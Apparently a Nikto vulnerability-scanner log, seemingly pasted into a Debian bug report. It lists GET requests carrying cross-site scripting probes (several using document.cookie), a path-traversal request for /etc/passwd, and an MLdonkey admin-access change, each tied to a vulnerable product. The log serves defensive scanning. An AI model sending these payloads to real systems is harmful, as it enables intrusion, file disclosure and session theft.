+ OSVDB-0: GET /forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22 : Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script> : YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.
+ OSVDB-0: GET /error/500error.jsp?et=1<script>alert('Vulnerable')</script>; : Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.
+ OSVDB-0: GET /download.php?sortby=&dcategory=<script>alert('Vulnerable')</script> : This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /comments.php?subject=<script>alert('Vulnerable')</script>&comment=<script>alert('Vulnerable')</script>&pid=0&sid=0&mode=&order=&thold=op=Preview : This version of PHP-Nuke's comments.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.
+ OSVDB-0: GET /cleartrust/ct_logon.asp?CTLoginErrorMsg=<script>alert(1)</script> : RSA ClearTrust allows Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /cgi-local/cgiemail-1.6/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /cgi-local/cgiemail-1.4/cgicso?query=<script>alert('Vulnerable')</script> : This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /calendar.php?year=<script>alert(document.cookie);</script>&month=03&day=05 : DCP-Portal v5.3.1 is vulnerable to  Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ca000007.pl?ACTION=SHOWCART&REFPAGE=\"><script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /ca000001.pl?ACTION=SHOWCART&hop=\"><script>alert('Vulnerable')</script>&PATH=acatalog%2f : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /bb000001.pl<script>alert('Vulnerable')</script> : Actinic E-Commerce services is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /article.cfm?id=1'<script>alert(document.cookie);</script> : With malformed URLS, Coldfusion is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /apps/web/vs_diag.cgi?server=<script>alert('Vulnerable')</script> : Zeus 4.2r2 (webadmin-4.2r2) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /addressbook/index.php?surname=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /addressbook/index.php?name=<script>alert('Vulnerable')</script> : Phpgroupware 0.9.14.003 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /add.php3?url=ja&adurl=javascript:<script>alert('Vulnerable')</script> :  1.1 http://www.sugarfreenet.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /a?<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS) in the error message if code is passed in the query-string. This may be a Null HTTPd server.
+ OSVDB-0: GET /a.jsp/<script>alert('Vulnerable')</script> : JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.thtml : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.shtml : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.jsp : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-0: GET /<script>alert('Vulnerable')</script>.aspx : Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02.
+ OSVDB-0: GET /%0a%0a<script>alert(\"Vulnerable\")</script>.jsp : Jetty jsp servlet engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3126: GET /submit?setoption=q&option=allowed_ips&value=255.255.255.255 : MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080.
+ OSVDB-6662: GET /<script>alert('Vulnerable')</script> : Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-9239: GET /mailman/admin/ml-name?\"><script>alert('Vulnerable')</script>; : Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-16207: GET /mail/addressaction.html?id=<USERID#>&newaddress=1&addressname=<script>alert('Vulnerable')</script>&addressemail=junk@example.com : IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-25499: GET /affich.php?image=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-25498: GET /diapo.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-700: GET /fcgi-bin/echo?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3954: GET /fcgi-bin/echo2?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-700: GET /fcgi-bin/echo.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3954: GET /fcgi-bin/echo2.exe?foo=<script>alert('Vulnerable')</script> : Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-14633: GET /ab2/Help_C/\@Ab2HelpSearch?scope=HELP&DwebQuery=<script>alert(Vulnerable)</script>  : Sun Answerbook is vulnerable to XSS in the search field.
+ OSVDB-19947: GET /apps/web/index.fcgi?servers=&section=<script>alert(document.cookie)</script> : Zeus Admin server 4.1r2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-12607: GET /forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /bugs/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /bugs/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12606: GET /eventum/index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-12607: GET /eventum/forgot_password.php?email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2562: GET /login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?error=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2562: GET /SPHERA/login/sm_login_screen.php?uid=\"><script>alert('Vulnerable')</script> : SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-2617: GET /acart2_0/signin.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-2921: GET /shopping/shopdisplayproducts.asp?id=1&cat=<script>alert('test')</script> : VP-ASP prior to 4.50 are vulnerable to XSS attacks
+ OSVDB-2921: GET shopdisplayproducts.asp?id=1&cat=<script>alert(document.cookie)</script> : VP-ASP SHopping Cart 4.x shopdisplayproducts.asp XSS.
+ OSVDB-3133: GET ////////../../../../../../etc/passwd : Xerox WorkCentre allows any file to be retrieved remotely.
+ OSVDB-3280: GET /forum/memberlist.php?s=23c37cf1af5d2ad05f49361b0407ad9e&what=\">\"<script>javascript:alert(document.cookie)</script> : Vbulletin 2.2.9 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3289: GET /firewall/policy/dlg?q=-1&fzone=t<script>alert('Vulnerable')</script>>&tzone=dmz : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3294: GET /firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('Vulnerable')</script> : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=blacklist&name=b<script>alert('Vulnerable')</script>&startline=0 : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3295: GET /antispam/listdel?file=whitelist&name=a<script>alert('Vulnerable')</script>&startline=0(naturally) : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\"><script>alert('Vulnerable')</script>,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session&button_url=/system/status/status\"><script>alert('Vulnerable')</script>,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3296: GET /theme1/selector?button=status,monitor,session\"><script>alert('Vulnerable')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session : Fortigate firewall 2.50 and prior contains several CSS vulnerabilities in various administrative pages.
+ OSVDB-3417: GET /examplesWebApp/InteractiveQuery.jsp?person=<script>alert('Vulnerable')</script> : BEA WebLogic 8.1 and below are vulnerable to Cross Site Scripting (XSS) in example code. CAN-2003-0624. CA-2000-02.
+ OSVDB-3458: GET /sgdynamo.exe?HTNAME=<script>alert('Vulnerable')</script> : Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CAN-2002-0375. CA-2000-02.
+ OSVDB-3483: GET /docs/<script>alert('Vulnerable');</script> : Nokia Electronic Documentation is vulneable to Cross Site Scripting (XSS). CAN-2003-0801.
+ OSVDB-3486: GET /aktivate/cgi-bin/catgy.cgi?key=0&cartname=axa200135022551089&desc=<script>alert('Vulnerable')</script> : Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02.
+ OSVDB-3632: GET /webcalendar/colors.php?color=</script><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3633: GET /webcalendar/week.php?user=\"><script>alert(document.cookie)</script> : Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-3762: GET /debug/dbg?host==<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/echo?name=<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/errorInfo?title===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts. CA-2000-02.
+ OSVDB-3762: GET /debug/showproc?proc===<script>alert('Vulnerable');</script> : The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.
+ OSVDB-4262: GET /addressbook.php?\"><script>alert(Vulnerable)</script><!-- : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4265: GET /help.php?chapter=<script>alert('Vulnerable')</script> : Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-4356: GET /acart2_0/deliver.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4357: GET /acart2_0/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4358: GET /acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-4359: GET /acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script> : Alan Ward A-Cart 2.0 contains several XSS vulnerabilities
+ OSVDB-5097: GET /wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5098: GET /sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5099: GET /sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5102: GET /syshelp/stmex.stm?foo=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5103: GET /syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5104: GET /syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5105: GET /syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5106: GET /netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5107: GET /netutils/findata.stm?host=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5107: GET /netutils/findata.stm?user=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5108: GET /sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script> : Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5457: GET /webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5458: GET /webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5459: GET /webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5460: GET /webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-5461: GET /webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script> : Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-6659: GET /seeV0KoysiqHYvXK8q1zswJYGYkZuORRlCEbA28kntfzVd21ItEmBXl8ftdF9DMYZ1QB51QHlC9F5Auo0zk6S5ezAZwsBkrCl4k8DWbAFarJrQTv83I03Jl89XOy39MYKNPHKX6dxMP4JGj6l9wK5yekrcfn7zmNEnfxpgXh9QXG9TqpdTEyOqGtrcMq0FuM8sVYYSza3vNXxFcCYN0KTDLZw5iTny5<font%20size=50><script>alert('Vulnerable')</script><!--//-- : MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-701: GET /pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-701: GET /pls/help/<script>alert('Vulnerable')</script> : Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.
+ OSVDB-20406: GET /phpinfo.php?GLOBALS[test]=<script>alert(document.cookie);</script> : PHP contains a flaw that allows a remote cross site scripting attack.
+ OSVDB-24484: GET /phpinfo.php?cx[]=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<script>alert(foo)</script> : PHP 5.1.2 and 4.4.2 phpinfo() Function Long Array XSS
+ 2967 items checked: 233 item(s) reported on remote host
+ End Time:        2009-03-11 4:27:04 (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Information forwarded to debian-bugs-dist@lists.debian.org, Debian OCaml Maintainers <debian-ocaml-maint@lists.debian.org>:
